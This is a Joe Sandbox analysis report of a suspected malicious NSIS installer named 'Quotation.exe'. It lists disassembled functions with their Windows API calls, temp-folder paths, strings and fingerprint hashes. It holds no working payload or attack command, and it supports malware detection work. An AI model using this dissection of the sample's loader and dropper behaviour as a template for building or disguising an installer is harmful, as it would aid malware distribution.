                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID: Calibri
                                                              • API String ID: 3808545654-1409258342
                                                              • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                              • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                              • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                              • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                              Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                              • MulDiv.KERNEL32(000A7380,00000064,000A8750), ref: 00402FE1
                                                              • wsprintfW.USER32 ref: 00402FF1
                                                              • SetWindowTextW.USER32(?,?), ref: 00403001
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402FEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                              • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                              • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                              • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                              Function 73422655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 734212BB: GlobalAlloc.KERNELBASE(00000040,?,734212DB,?,7342137F,00000019,734211CA,-000000A0), ref: 734212C5
                                                              • GlobalFree.KERNEL32(?), ref: 73422743
                                                              • GlobalFree.KERNEL32(00000000), ref: 73422778
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: fa937e9819816fbe33cea23674f3c14f94a6dda59f9cbcc8da2b80631423866f
                                                              • Instruction ID: 2ecd288734694744ff0c76119cb14e06793f773dfe51d1e491d42f92caea0c6b
                                                              • Opcode Fuzzy Hash: fa937e9819816fbe33cea23674f3c14f94a6dda59f9cbcc8da2b80631423866f
                                                              • Instruction Fuzzy Hash: CD31BC72108909DFD75EAF55CC84F2ABBBAEB95306724416DF105B3261C73058458B69
                                                              Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                              • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                              • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                              • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                              • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                              Function 73421979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal
                                                              • String ID:
                                                              • API String ID: 2979337801-0
                                                              • Opcode ID: e7fc705cff2720f18d496075e5c20ef9d486cde3b18ae5f8b7c50b4c0986e98b
                                                              • Instruction ID: 8b233226daaf65189b016caee4a2dd33203bba88a6c302b517513eb3b89781e0
                                                              • Opcode Fuzzy Hash: e7fc705cff2720f18d496075e5c20ef9d486cde3b18ae5f8b7c50b4c0986e98b
                                                              • Instruction Fuzzy Hash: B351B332D00118ABDB0E9FA48C4479EBEBAEB44397F054159F407B3394E671A946C79D
                                                              Function 73422480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 734225C2
                                                                • Part of subcall function 734212CC: lstrcpynW.KERNEL32(00000000,?,7342137F,00000019,734211CA,-000000A0), ref: 734212DC
                                                              • GlobalAlloc.KERNEL32(00000040), ref: 73422548
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73422563
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 4216380887-0
                                                              • Opcode ID: 26a40b2bc26bed0242643d6baf6beab64704da029fcf7581aa83a73469c0e94b
                                                              • Instruction ID: b010e727c107da2bc2c359f59072fbfc4de464bba44e61bc446ea9daa60c1089
                                                              • Opcode Fuzzy Hash: 26a40b2bc26bed0242643d6baf6beab64704da029fcf7581aa83a73469c0e94b
                                                              • Instruction Fuzzy Hash: 8041ACB1008309EFE79CEF259840B267BF8FF64312F10891DE45AB6291E770A585CB69
                                                              Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                              • GetClientRect.USER32(?,?), ref: 00401DEA
                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                              • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                              • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                              • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                              • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                              Function 734216BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,734222D8,?,00000808), ref: 734216D5
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,734222D8,?,00000808), ref: 734216DC
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,734222D8,?,00000808), ref: 734216F0
                                                              • GetProcAddress.KERNEL32(734222D8,00000000), ref: 734216F7
                                                              • GlobalFree.KERNEL32(00000000), ref: 73421700
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                              • String ID:
                                                              • API String ID: 1148316912-0
                                                              • Opcode ID: 18b7f5ed3f78e0d32f961ea3ba96a243b2a9d201bd85643c7f79f5c51f5a7074
                                                              • Instruction ID: a8f5fa43723caecb989450fcf9d1ffa51e5afcceffbb0178f86b95004f6b3653
                                                              • Opcode Fuzzy Hash: 18b7f5ed3f78e0d32f961ea3ba96a243b2a9d201bd85643c7f79f5c51f5a7074
                                                              • Instruction Fuzzy Hash: B8F012731061387BD6202AA79C4CD9B7E9CDF9B2F5B110215F61CB229185614C41D7F1
                                                              Function 00404D4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                              • wsprintfW.USER32 ref: 00404DF7
                                                              • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                              • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                              • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                              • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                              Function 00405EF8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405EA9
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405F51
                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsd350B.tmp
                                                              • API String ID: 3248276644-3438590690
                                                              • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                              • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                              • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                              • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                              Function 00405E9B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405EA9
                                                              • CharNextW.USER32(00000000), ref: 00405EAE
                                                              • CharNextW.USER32(00000000), ref: 00405EC6
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsd350B.tmp, xrefs: 00405E9C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp
                                                              • API String ID: 3213498283-3684517792
                                                              • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                              • Instruction ID: c4cc3313bff2df52cb6c0caf4e8c88866a305d48728ab5da0ab5d468dade8cef
                                                              • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                              • Instruction Fuzzy Hash: E4F0F631910F2595DA317764CC44E7766B8EB54351B00803BD282B36C1DBF88A819FEA
                                                              Function 00405DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-823278215
                                                              • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                              • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                              • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                              • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                              Function 734210E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 73421171
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 734211E3
                                                              • GlobalFree.KERNEL32 ref: 7342124A
                                                              • GlobalFree.KERNEL32(?), ref: 7342129B
                                                              • GlobalFree.KERNEL32(00000000), ref: 734212B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 15ff8c3ab871e3b38eb504cf97f5c6ab58096b259aad936d60e026f9e7dfbc72
                                                              • Instruction ID: e48a13941b345c1aab0f85ce950df1b15d3472172c89f20aa01edd8aeef4cd60
                                                              • Opcode Fuzzy Hash: 15ff8c3ab871e3b38eb504cf97f5c6ab58096b259aad936d60e026f9e7dfbc72
                                                              • Instruction Fuzzy Hash: 96515EB6900215DFE7089F69CD44F26BBF8FB18316B144159F94AFB352E7349901CB68
                                                              Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 0040269A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
